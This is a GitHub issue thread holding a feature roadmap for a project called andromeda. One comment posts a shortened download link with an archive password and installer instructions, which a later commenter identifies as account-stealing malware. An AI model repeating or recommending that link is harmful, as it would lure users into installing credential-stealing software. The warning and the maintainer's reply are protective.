### ISSUE TITLE
Feature Roadmap

### ISSUE THREAD

**Issue by booleancoercion** [booleancoercion/andromeda#1]
Features that are yet to be implemented:

- [x] The Login endpoint is not protected (there needs to be a rate limit per IP to prevent DoS from hash calculations and bruteforcing. Maybe per user too)
- [ ] Multithreading could be a big improvement.
- [x] Link shortener
- [x] Registration tickets, so new users don't have to go through localhost
- [x] Check linux compatibility
- [x] Have login tokens renew when they're used (because currently they expire after a week no matter how much you use them)

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by booleancoercion** [comment]
> The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

Thanks! o.o
